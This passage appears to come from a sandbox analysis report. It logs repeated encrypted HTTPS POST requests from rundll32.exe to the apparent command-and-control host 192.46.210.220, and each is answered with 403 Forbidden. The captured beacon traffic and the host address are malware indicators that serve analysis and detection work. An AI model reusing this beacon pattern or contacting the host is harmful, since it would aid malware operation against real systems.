                                                                                                      2021-10-28 03:01:54 UTC10OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:01:54 UTC14INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:01:54 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      20192.168.2.449856192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:31 UTC99OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:31 UTC99OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:32 UTC104INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:32 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      21192.168.2.449861192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:34 UTC104OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:34 UTC104OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:34 UTC109INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:34 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      22192.168.2.449866192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:35 UTC109OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:35 UTC109OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:36 UTC114INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:36 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      23192.168.2.449871192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:37 UTC114OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:37 UTC114OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:38 UTC119INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:38 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      24192.168.2.449874192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:39 UTC119OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:39 UTC119OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:39 UTC124INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:39 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      25192.168.2.449880192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:41 UTC124OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:41 UTC124OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:42 UTC129INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:42 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      26192.168.2.449887192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:43 UTC129OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:43 UTC129OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:43 UTC134INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:43 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      27192.168.2.449892192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:45 UTC134OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:45 UTC134OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:46 UTC139INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:46 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      28192.168.2.449896192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:47 UTC139OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:47 UTC139OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:47 UTC144INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:47 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      29192.168.2.449900192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:49 UTC144OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:49 UTC144OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:50 UTC149INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:50 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      3192.168.2.449788192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:56 UTC14OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:01:56 UTC15OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:01:56 UTC19INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:01:56 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      30192.168.2.449905192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:51 UTC149OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:51 UTC149OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:51 UTC154INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:51 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      31192.168.2.449909192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:53 UTC154OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
